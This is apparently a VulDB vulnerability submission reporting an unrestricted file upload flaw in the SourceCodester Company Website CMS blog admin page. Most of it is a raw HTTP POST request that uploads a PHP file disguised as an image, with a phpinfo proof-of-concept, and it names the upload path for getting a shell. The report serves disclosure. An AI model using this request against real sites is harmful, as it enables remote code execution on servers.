Submit #43177: Company website CMS------backend blog management RCEinfo

TitleCompany website CMS------backend blog management RCE
Descriptioninfo:There is an arbitrary file upload vulnerability in the company's website CMS background add-blog Add a blog in the background, upload attachments, capture packets, and modify the attachment suffix to php as needed. Modify the content of the attachment to realize RCE by php code getshell. Then traverse the URL:/dashboard/uploads/blog/xxxxx.php access payload: POST /dashboard/add-blog.php HTTP/1.1 Host: 192.168.153.1:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------2960604280433651870831976 Content-Length: 674 Origin: http://192.168.153.1:8090 Connection: close Referer: http://192.168.153.1:8090/dashboard/add-blog.php Cookie: PHPSESSID=0n5rjh4b6tqupjl95toh92f4jb Upgrade-Insecure-Requests: 1 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_title" t1 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_desc" t2 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_detail" t3 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="ufile"; filename="123.php" Content-Type: image/png <?php phpinfo();?> -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="save" -----------------------------2960604280433651870831976--
Source⚠️ https:// www.sourcecodester.com/php/15517/company-website-cms-php.html
User
 jsbae3449 (UID 30775)
Submission08/09/2022 16:54 (4 years ago)
Moderation08/09/2022 18:54 (2 hours later)
StatusAccepted
VulDB entry205882 [SourceCodester Company Website CMS Add Blog /dashboard/add-blog.php ufile unrestricted upload]
Points20

PreviousOverviewNext

Want to stay up to date on a daily basis?

Enable the mail alert feature now!